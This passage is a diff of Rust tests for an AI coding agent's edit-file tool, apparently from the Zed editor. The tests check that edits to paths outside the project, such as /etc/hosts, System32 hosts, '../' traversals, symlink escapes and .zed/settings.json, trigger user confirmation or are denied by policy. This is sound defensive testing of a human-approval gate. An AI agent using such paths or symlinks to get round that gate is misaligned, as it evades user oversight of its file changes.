let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "test 5.1".into(), - path: ".zed/settings.json".into(), - mode: EditFileMode::Edit, - }, + &PathBuf::from(".zed/settings.json"), + "test 5.1", &stream_tx, cx, ) @@ -1238,30 +2648,17 @@ mod tests { // 5.2: /etc/hosts is outside the project, but Allow auto-approves let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "test 5.2".into(), - path: "/etc/hosts".into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }) - .await - .unwrap(); + cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.2", &stream_tx, cx)) + .await + .unwrap(); assert!(stream_rx.try_recv().is_err()); // 5.3: Normal in-project path with allow — no confirmation needed let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "test 5.3".into(), - path: "root/src/main.rs".into(), - mode: EditFileMode::Edit, - }, + &PathBuf::from("root/src/main.rs"), + "test 5.3", &stream_tx, cx, ) @@ -1278,24 +2675,15 @@ mod tests { }); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "test 5.4".into(), - path: "/etc/hosts".into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + let _auth = cx + .update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.4", &stream_tx, cx)); let event = stream_rx.expect_authorization().await; assert_eq!(event.tool_call.fields.title, Some("test 5.4".into())); } #[gpui::test] - async fn test_authorize_create_under_symlink_with_allow(cx: &mut TestAppContext) { + async fn test_streaming_authorize_create_under_symlink_with_allow(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -1303,28 +2691,8 @@ mod tests { fs.insert_tree("/outside", json!({})).await; fs.insert_symlink("/root/link", PathBuf::from("/outside")) .await; - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project, - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; cx.update(|cx| { let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); @@ -1335,11 +2703,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let authorize_task = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "create through symlink".into(), - path: "link/new.txt".into(), - mode: EditFileMode::Create, - }, + &PathBuf::from("link/new.txt"), + "create through symlink", &stream_tx, cx, ) @@ -1367,7 +2732,9 @@ mod tests { } #[gpui::test] - async fn test_edit_file_symlink_escape_requests_authorization(cx: &mut TestAppContext) { + async fn test_streaming_edit_file_symlink_escape_requests_authorization( + cx: &mut TestAppContext, + ) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -1391,39 +2758,14 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _authorize_task = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "edit through symlink".into(), - path: PathBuf::from("link_to_external/config.txt"), - mode: EditFileMode::Edit, - }, + &PathBuf::from("link_to_external/config.txt"), + "edit through symlink", &stream_tx, cx, ) @@ -1438,7 +2780,7 @@ mod tests { } #[gpui::test] - async fn test_edit_file_symlink_escape_denied(cx: &mut TestAppContext) { + async fn test_streaming_edit_file_symlink_escape_denied(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); @@ -1462,39 +2804,14 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let authorize_task = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "edit through symlink".into(), - path: PathBuf::from("link_to_external/config.txt"), - mode: EditFileMode::Edit, - }, + &PathBuf::from("link_to_external/config.txt"), + "edit through symlink", &stream_tx, cx, ) @@ -1508,7 +2825,7 @@ mod tests { } #[gpui::test] - async fn test_edit_file_symlink_escape_honors_deny_policy(cx: &mut TestAppContext) { + async fn test_streaming_edit_file_symlink_escape_honors_deny_policy(cx: &mut TestAppContext) { init_test(cx); cx.update(|cx| { let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); @@ -1543,40 +2860,15 @@ mod tests { ) .await .unwrap(); - - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - cx.executor().run_until_parked(); - - let language_registry = project.read_with(cx, |project, _| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let result = cx .update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "edit through symlink".into(), - path: PathBuf::from("link_to_external/config.txt"), - mode: EditFileMode::Edit, - }, + &PathBuf::from("link_to_external/config.txt"), + "edit through symlink", &stream_tx, cx, ) @@ -1594,33 +2886,13 @@ mod tests { } #[gpui::test] - async fn test_authorize_global_config(cx: &mut TestAppContext) { + async fn test_streaming_authorize_global_config(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/project", json!({})).await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - // Test global config paths - these should require confirmation if they exist and are outside the project let test_cases = vec![ ( "/etc/hosts", @@ -1641,17 +2913,8 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: path.into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + let auth = + cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); if should_confirm { stream_rx.expect_authorization().await; @@ -1668,11 +2931,9 @@ mod tests { } #[gpui::test] - async fn test_needs_confirmation_with_multiple_worktrees(cx: &mut TestAppContext) { + async fn test_streaming_needs_confirmation_with_multiple_worktrees(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); - - // Create multiple worktree directories fs.insert_tree( "/workspace/frontend", json!({ @@ -1700,40 +2961,17 @@ mod tests { }), ) .await; - - // Create project with multiple worktrees - let project = Project::test( - fs.clone(), - [ + let (tool, _project, _action_log, _fs, _thread) = setup_test_with_fs( + cx, + fs, + &[ path!("/workspace/frontend").as_ref(), path!("/workspace/backend").as_ref(), path!("/workspace/shared").as_ref(), ], - cx, ) .await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); - // Test files in different worktrees let test_cases = vec![ ("frontend/src/main.js", false, "File in first worktree"), ("backend/src/main.rs", false, "File in second worktree"), @@ -1747,22 +2985,13 @@ mod tests { "../outside/file.txt", true, "Relative path outside worktrees", - ), - ]; - - for (path, should_confirm, description) in test_cases { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: path.into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + ), + ]; + + for (path, should_confirm, description) in test_cases { + let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); + let auth = + cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); if should_confirm { stream_rx.expect_authorization().await; @@ -1779,7 +3008,7 @@ mod tests { } #[gpui::test] - async fn test_needs_confirmation_edge_cases(cx: &mut TestAppContext) { + async fn test_streaming_needs_confirmation_edge_cases(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree( @@ -1796,35 +3025,12 @@ mod tests { }), ) .await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - // Test edge cases let test_cases = vec![ - // Empty path - find_project_path returns Some for empty paths ("", false, "Empty path is treated as project root"), - // Root directory ("/", true, "Root directory should be outside project"), - // Parent directory references - find_project_path resolves these ( "project/../other", true, @@ -1835,7 +3041,6 @@ mod tests { false, "Path with . should work normally", ), - // Windows-style paths (if on Windows) #[cfg(target_os = "windows")] ("C:\\Windows\\System32\\hosts", true, "Windows system path"), #[cfg(target_os = "windows")] @@ -1844,17 +3049,8 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = cx.update(|cx| { - tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: path.into(), - mode: EditFileMode::Edit, - }, - &stream_tx, - cx, - ) - }); + let auth = + cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); cx.run_until_parked(); @@ -1873,7 +3069,7 @@ mod tests { } #[gpui::test] - async fn test_needs_confirmation_with_different_modes(cx: &mut TestAppContext) { + async fn test_streaming_needs_confirmation_with_different_modes(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree( @@ -1886,45 +3082,18 @@ mod tests { }), ) .await; - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - Templates::new(), - )); + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - // Test different EditFileMode values - let modes = vec![ - EditFileMode::Edit, - EditFileMode::Create, - EditFileMode::Overwrite, - ]; + let modes = vec![EditFileMode::Edit, EditFileMode::Write]; - for mode in modes { + for _mode in modes { // Test .zed path with different modes let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "Edit settings".into(), - path: "project/.zed/settings.json".into(), - mode: mode.clone(), - }, + &PathBuf::from("project/.zed/settings.json"), + "Edit settings", &stream_tx, cx, ) @@ -1936,11 +3105,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: "/outside/file.txt".into(), - mode: mode.clone(), - }, + &PathBuf::from("/outside/file.txt"), + "Edit file", &stream_tx, cx, ) @@ -1952,11 +3118,8 @@ mod tests { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); cx.update(|cx| { tool.authorize( - &EditFileToolInput { - display_description: "Edit file".into(), - path: "project/normal.txt".into(), - mode: mode.clone(), - }, + &PathBuf::from("project/normal.txt"), + "Edit file", &stream_tx, cx, ) @@ -1968,40 +3131,19 @@ mod tests { } #[gpui::test] - async fn test_initial_title_with_partial_input(cx: &mut TestAppContext) { + async fn test_streaming_initial_title_with_partial_input(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); - let project = Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let tool = Arc::new(EditFileTool::new( - project, - thread.downgrade(), - language_registry, - Templates::new(), - )); + fs.insert_tree("/project", json!({})).await; + let (tool, _project, _action_log, _fs, _thread) = + setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; cx.update(|cx| { - // ... assert_eq!( tool.initial_title( Err(json!({ "path": "src/main.rs", "display_description": "", - "old_string": "old code", - "new_string": "new code" })), cx ), @@ -2012,8 +3154,6 @@ mod tests { Err(json!({ "path": "", "display_description": "Fix error handling", - "old_string": "old code", - "new_string": "new code" })), cx ), @@ -2024,8 +3164,6 @@ mod tests { Err(json!({ "path": "src/main.rs", "display_description": "Fix error handling", - "old_string": "old code", - "new_string": "new code" })), cx ), @@ -2036,8 +3174,6 @@ mod tests { Err(json!({ "path": "", "display_description": "", - "old_string": "old code", - "new_string": "new code" })), cx ), @@ -2051,42 +3187,25 @@ mod tests { } #[gpui::test] - async fn test_diff_finalization(cx: &mut TestAppContext) { + async fn test_streaming_diff_finalization(cx: &mut TestAppContext) { init_test(cx); let fs = project::FakeFs::new(cx.executor()); fs.insert_tree("/", json!({"main.rs": ""})).await; - - let project = Project::test(fs.clone(), [path!("/").as_ref()], cx).await; - let languages = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry.clone(), - Templates::new(), - Some(model.clone()), - cx, - ) - }); + let (tool, project, action_log, _fs, thread) = + setup_test_with_fs(cx, fs, &[path!("/").as_ref()]).await; + let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); // Ensure the diff is finalized after the edit completes. { - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - languages.clone(), - Templates::new(), - )); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let edit = cx.update(|cx| { - tool.run( + tool.clone().run( ToolInput::resolved(EditFileToolInput { display_description: "Edit file".into(), path: path!("/main.rs").into(), - mode: EditFileMode::Edit, + mode: EditFileMode::Write, + content: Some("new content".into()), + edits: None, }), stream_tx, cx, @@ -2096,47 +3215,17 @@ mod tests { let diff = stream_rx.expect_diff().await; diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Pending(_)))); cx.run_until_parked(); - model.end_last_completion_stream(); edit.await.unwrap(); diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); } - // Ensure the diff is finalized if an error occurs while editing. - { - model.forbid_requests(); - let tool = Arc::new(EditFileTool::new( - project.clone(), - thread.downgrade(), - languages.clone(), - Templates::new(), - )); - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let edit = cx.update(|cx| { - tool.run( - ToolInput::resolved(EditFileToolInput { - display_description: "Edit file".into(), - path: path!("/main.rs").into(), - mode: EditFileMode::Edit, - }), - stream_tx, - cx, - ) - }); - stream_rx.expect_update_fields().await; - let diff = stream_rx.expect_diff().await; - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Pending(_)))); - edit.await.unwrap_err(); - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); - model.allow_requests(); - } - // Ensure the diff is finalized if the tool call gets dropped. { let tool = Arc::new(EditFileTool::new( project.clone(), thread.downgrade(), - languages.clone(), - Templates::new(), + action_log, + language_registry, )); let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let edit = cx.update(|cx| { @@ -2144,7 +3233,9 @@ mod tests { ToolInput::resolved(EditFileToolInput { display_description: "Edit file".into(), path: path!("/main.rs").into(), - mode: EditFileMode::Edit, + mode: EditFileMode::Write, + content: Some("dropped content".into()), + edits: None, }), stream_tx, cx, @@ -2160,49 +3251,16 @@ mod tests { } #[gpui::test] - async fn test_file_read_times_tracking(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - - // Initially, file_read_times should be empty - let is_empty = action_log.read_with(cx, |action_log, _| { - action_log - .file_read_time(path!("/root/test.txt").as_ref()) - .is_none() - }); - assert!(is_empty, "file_read_times should start empty"); - - // Create read tool + async fn test_streaming_consecutive_edits_work(cx: &mut TestAppContext) { + let (tool, project, action_log, _fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( project.clone(), action_log.clone(), true, )); - // Read the file to record the read time + // Read the file first cx.update(|cx| { read_tool.clone().run( ToolInput::resolved(crate::ReadFileToolInput { @@ -2217,84 +3275,65 @@ mod tests { .await .unwrap(); - // Verify that file_read_times now contains an entry for the file - let has_entry = action_log.read_with(cx, |log, _| { - log.file_read_time(path!("/root/test.txt").as_ref()) - .is_some() - }); + // First edit should work + let edit_result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "First edit".into(), + path: "root/test.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "original content".into(), + new_text: "modified content".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; assert!( - has_entry, - "file_read_times should contain an entry after reading the file" + edit_result.is_ok(), + "First edit should succeed, got error: {:?}", + edit_result.as_ref().err() ); - // Read the file again - should update the entry - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - // Should still have an entry after re-reading - let has_entry = action_log.read_with(cx, |log, _| { - log.file_read_time(path!("/root/test.txt").as_ref()) - .is_some() - }); + // Second edit should also work because the edit updated the recorded read time + let edit_result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Second edit".into(), + path: "root/test.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "modified content".into(), + new_text: "further modified content".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; assert!( - has_entry, - "file_read_times should still have an entry after re-reading" + edit_result.is_ok(), + "Second consecutive edit should succeed, got error: {:?}", + edit_result.as_ref().err() ); } - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - }); - } - #[gpui::test] - async fn test_consecutive_edits_work(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - - let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); - let edit_tool = Arc::new(EditFileTool::new( + async fn test_streaming_external_modification_matching_edit_succeeds(cx: &mut TestAppContext) { + let (tool, project, action_log, fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; + let read_tool = Arc::new(crate::ReadFileTool::new( project.clone(), - thread.downgrade(), - languages, - Templates::new(), + action_log.clone(), + true, )); // Read the file first @@ -2312,102 +3351,79 @@ mod tests { .await .unwrap(); - // First edit should work - let edit_result = { - let edit_task = cx.update(|cx| { - edit_tool.clone().run( - ToolInput::resolved(EditFileToolInput { - display_description: "First edit".into(), - path: "root/test.txt".into(), - mode: EditFileMode::Edit, - }), - ToolCallEventStream::test().0, - cx, - ) - }); - - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk( - "original contentmodified content" - .to_string(), - ); - model.end_last_completion_stream(); + // Simulate external modification + cx.background_executor + .advance_clock(std::time::Duration::from_secs(2)); + fs.save( + path!("/root/test.txt").as_ref(), + &"externally modified content".into(), + language::LineEnding::Unix, + ) + .await + .unwrap(); - edit_task.await - }; - assert!( - edit_result.is_ok(), - "First edit should succeed, got error: {:?}", - edit_result.as_ref().err() - ); + // Reload the buffer to pick up the new mtime + let project_path = project + .read_with(cx, |project, cx| { + project.find_project_path("root/test.txt", cx) + }) + .expect("Should find project path"); + let buffer = project + .update(cx, |project, cx| project.open_buffer(project_path, cx)) + .await + .unwrap(); + buffer + .update(cx, |buffer, cx| buffer.reload(cx)) + .await + .unwrap(); - // Second edit should also work because the edit updated the recorded read time - let edit_result = { - let edit_task = cx.update(|cx| { - edit_tool.clone().run( + cx.executor().run_until_parked(); + + let result = cx + .update(|cx| { + tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Second edit".into(), + display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "externally modified content".into(), + new_text: "new content".into(), + }]), }), ToolCallEventStream::test().0, cx, ) - }); - - cx.executor().run_until_parked(); - model.send_last_completion_stream_text_chunk( - "modified contentfurther modified content".to_string(), - ); - model.end_last_completion_stream(); + }) + .await + .unwrap(); - edit_task.await + let EditFileToolOutput::Success { + new_text, + input_path, + .. + } = result + else { + panic!("expected success"); }; - assert!( - edit_result.is_ok(), - "Second consecutive edit should succeed, got error: {:?}", - edit_result.as_ref().err() - ); + + assert_eq!(new_text, "new content"); + assert_eq!(input_path, PathBuf::from("root/test.txt")); } #[gpui::test] - async fn test_external_modification_detected(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - - let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); - let edit_tool = Arc::new(EditFileTool::new( + async fn test_streaming_external_modification_mentioned_when_match_fails( + cx: &mut TestAppContext, + ) { + let (tool, project, action_log, fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; + let read_tool = Arc::new(crate::ReadFileTool::new( project.clone(), - thread.downgrade(), - languages, - Templates::new(), + action_log.clone(), + true, )); - // Read the file first cx.update(|cx| { read_tool.clone().run( ToolInput::resolved(crate::ReadFileToolInput { @@ -2422,7 +3438,6 @@ mod tests { .await .unwrap(); - // Simulate external modification - advance time and save file cx.background_executor .advance_clock(std::time::Duration::from_secs(2)); fs.save( @@ -2433,7 +3448,6 @@ mod tests { .await .unwrap(); - // Reload the buffer to pick up the new mtime let project_path = project .read_with(cx, |project, cx| { project.find_project_path("root/test.txt", cx) @@ -2450,14 +3464,18 @@ mod tests { cx.executor().run_until_parked(); - // Try to edit - should fail because file was modified externally let result = cx .update(|cx| { - edit_tool.clone().run( + tool.clone().run( ToolInput::resolved(EditFileToolInput { display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "original content".into(), + new_text: "new content".into(), + }]), }), ToolCallEventStream::test().0, cx, @@ -2465,53 +3483,35 @@ mod tests { }) .await; + let EditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { + panic!("expected error"); + }; + assert!( - result.is_err(), - "Edit should fail after external modification" + error.contains("Could not find matching text for edit at index 0"), + "Error should mention failed match, got: {error}" ); - let error_msg = result.unwrap_err().to_string(); assert!( - error_msg.contains("has been modified since you last read it"), - "Error should mention file modification, got: {}", - error_msg + error.contains("has changed on disk since you last read it"), + "Error should mention possible disk change, got: {error}" ); + assert!(diff.is_empty()); + assert_eq!(input_path, Some(PathBuf::from("root/test.txt"))); } #[gpui::test] - async fn test_dirty_buffer_detected(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "test.txt": "original content" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model.clone()), - cx, - ) - }); - let languages = project.read_with(cx, |project, _| project.languages().clone()); - let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); - - let read_tool = Arc::new(crate::ReadFileTool::new(project.clone(), action_log, true)); - let edit_tool = Arc::new(EditFileTool::new( + async fn test_streaming_dirty_buffer_detected(cx: &mut TestAppContext) { + let (tool, project, action_log, _fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; + let read_tool = Arc::new(crate::ReadFileTool::new( project.clone(), - thread.downgrade(), - languages, - Templates::new(), + action_log.clone(), + true, )); // Read the file first @@ -2529,7 +3529,7 @@ mod tests { .await .unwrap(); - // Open the buffer and make it dirty by editing without saving + // Open the buffer and make it dirty let project_path = project .read_with(cx, |project, cx| { project.find_project_path("root/test.txt", cx) @@ -2540,24 +3540,27 @@ mod tests { .await .unwrap(); - // Make an in-memory edit to the buffer (making it dirty) buffer.update(cx, |buffer, cx| 